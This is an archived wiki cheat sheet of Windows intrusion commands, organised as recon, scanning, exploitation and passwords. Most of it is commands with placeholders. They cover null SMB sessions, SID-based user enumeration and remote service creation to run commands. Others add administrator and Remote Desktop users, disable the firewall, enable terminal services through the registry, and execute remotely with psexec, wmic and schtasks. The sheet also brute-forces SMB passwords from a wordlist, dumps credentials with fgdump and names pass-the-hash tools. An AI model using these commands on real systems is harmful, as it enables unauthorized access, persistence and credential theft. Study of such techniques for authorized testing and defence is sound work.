WARNING: Wiki content is an archive, no promise about quality!
Recon
nslookup
-
Types of record: NS, A, HINFO, MX, TXT, CNAME, SOA, RP, PTR, SRV
nslookup <site>
-
Interactive mode:
nslookup > [name or ip] > server [server ip] > set type=any > ls -d [target_domain] [> filename] > view [filename]
-
No recurse:
> set norecurse > set recurse
Scanning
tracert
Parameters
- -d -- don't resolve names
- -h <N> -- max number of hops (default 30)
- -j <hostlist> -- use loose source routing
- -w <N> -- wait for Nms before timing out (default 4000)
SMB session
Establishing a null session
net use \\<target> "" /u:""
Establishing an authenticated session
net use \\<target> <password> /u:<username>
Mount a share
net use * \\<target>\<share> <password> /u:<username>
net use * \\<target>\<share> <password> /u:<machinename>\<username>
net use * \\<target>\c$ <password> /u:<username>
Dropping SMB sessions
net use \\<target> /del
Dropping all SMB sessions (bad idea)
net use * /del
Pulling credentials (w/ SMB session)
Pulling credentials
enum -U <target>
enum -G <target>
user2sid
-
Outputs in the form S-X-Y-target_sid-RID
user2sid \<target> <machine_name>
sid2user
-
Requires spaces instead of dashes
sid2user \<target> 5 <target_sid> <N>
for /L %i in (1000, 1, 1050) do @sid2user \<target> 5 <target_sid> %i
Exploitation
Finding client-side programs
dir /s "c:\Program Files"
dir /s /b "c:\Program Files\*.exe"
Service interaction
List running services
sc query
List all services
sc query state= all
List all service names
sc query state= all | find "SERVICE_NAME"
Query service information
sc query <servicename>
sc qc <servicename>
Start a service
sc config <servicename> start= demand
sc start <servicename>
Starting telnet
sc query tlntsvr
sc config tlntsvr start= demand
sc start tlntsvr
Starting terminal services
sc query termservice
sc config termservice start= demand
sc start termservice
Using sc to invoke an executable
net use \\<target> <password> /u:<username>
sc \\<target> create <name> binpath= <command>
sc \\<target> start <name>
Making that service invoke another executable
sc \\<target> <name> create binpath= "cmd.exe /k <command>"
Variables
Finding environmental variables
set
Finding a specific variable
set <variable>
echo %<variable>%
set username
set path
set systemroot
echo %systemroot%
cd %systemroot%
etc.
Users and groups
Listing users
net user
Creating a user
net user <username> <password> /add
Listing groups
net localgroup
Creating a group
net localgroup <groupname> /add
Adding a user to a group
net localgroup <groupname> <username> /add
Adding a user to the telnet users group
net user <username> <password> /add
net localgroup TelnetClients /add
net localgroup TelnetClients <username> /add
Adding a user to the terminal services group
net localgroup "Remote Desktop Users" <username> /add
List administrators
net localgroup administrators
Add an administrator
net user <username> %lt;password> /add
net localgroup administrators <username> /add
Remove a user from a group
net localgroup <group> <username> /del
Delete a user
net user <username> /del
Firewall interaction
Help
netsh /?
Show config
netsh firewall show config
Open a specific port
netsh firewall add portopening protocol = <TCP|UDP> port = <port> name = <comment> scope = custom addresses = <address/CIDR>
Remove the port opening
netsh firewall del portopening protocol = <TCP|UDP> port = <port>
Disable the firewall completely (bad idea)
netsh firewall set opmode disable
Opening the firewall for telnet
netsh firewall add portopening protocol = TCP port = 23 name = telnet mode = enable scope = custom addresses = <address>
Opening the firewall for terminal services
netsh firewall set service type = remotedesktop mode = enable scope = custom addresses = <address>
Opening the firewall for SSH
netsh firewall add portopening protocol = TCP port = 22 name = sshd mode = enable scope = custom addresses = <address>
Registry interaction
Query a key
reg query <keyname>
Adding a key
reg add <keyname> /v <valuename> /t <type> /d <data>
Export data
reg export <keyname> <filename.reg>
Import data
reg import <filename.reg>
Enabling terminal services
reg add "hklm\system\currentcontrolset\control\terminal server" /v fdenytsconnections /t reg_dword /d 0
netstat
Finding a port
netstat -an | find "<port>"
ipconfig
Dump the DNS cache
ipconfig /displaydns
arp
Dump the ARP cache
arp -a
Looping
/L loop
for /L %i in (<start>,<step>,<stop>) do <command>
Counting
for /L %i in (1,1,255) do @echo %i
Ping scanning
for /L %i in (1,1,255) do @echo 10.10.10.%i & @ping -n 5 10.10.10.%i | find "Reply"
DNS bruteforce
for /L %i in (1,1,255) do @nslookup 10.10.10.%i 2>nul | find "Name" && echo 10.10.10.%i
/F loop
for /F ["<options>"] %i in (<stuff>) do <command>
Looping through passwords
for /F %i in (password.lst) do @echo %i & @net use \\<target> %i /u:<username> 2>nul && pause
Portscanning from a file
for /F %i in (ports.txt) do @nc -n -vv -w3 10.10.10.50 %i
psexec
Using psexec (sysinternals)
- -s to run as system
- -c to copy the program to the target first
-
-d to run in "detached" mode (no console)
psexec \<target> -d -u <user> -p <password> <command>
at/schtasks
Starting the scheduler service
net use \\<target> <password> <username>
sc [\\<target>] query schedule
sc [\\<target>] start schedule
Scheduling with at:
at [\\<target>] <HH:MM><A|P> <command>
Scheduling with schtasks
schtasks /create /tn <taskname> /s <target> /u <user> /p <password> /sc <frequency> /st <starttime> /sd <startdate> /tr <command>
wmic
Running a program
wmic /node:<target> /user:<username> /password:<password> process call create <command>
List processes
wmic /node:<target> /user:<username> /password:<password> process list brief
wmic /node:<target> /user:<username> /password:<password> process where processid="<pid>" delete
wmic /node:<target> /user:<username> /password:<password> process where name="<name>" delete
Passwords
Account lockout
Info on Windows accounts
net accounts
net accounts /domain
fgdump
Options
- -c -- don't get cached credentials
- -h <target>
-
-u <username>
fgdump -c -h <target> -u <username>
Pass-the-hash toolkit (psh-toolkit)
Trend finally noticed/deleted these programs, so I don't have their parameters handy
- whosthere-exe
- genhash.exe
- iam.exe
Helpful hints
ftp
Download a file as anonymous
ftp -A -s:ftp-script.txt <host>
The script
get <file>
bye
An even better script, that grabs everything in the base directory
prompt
mget .
bye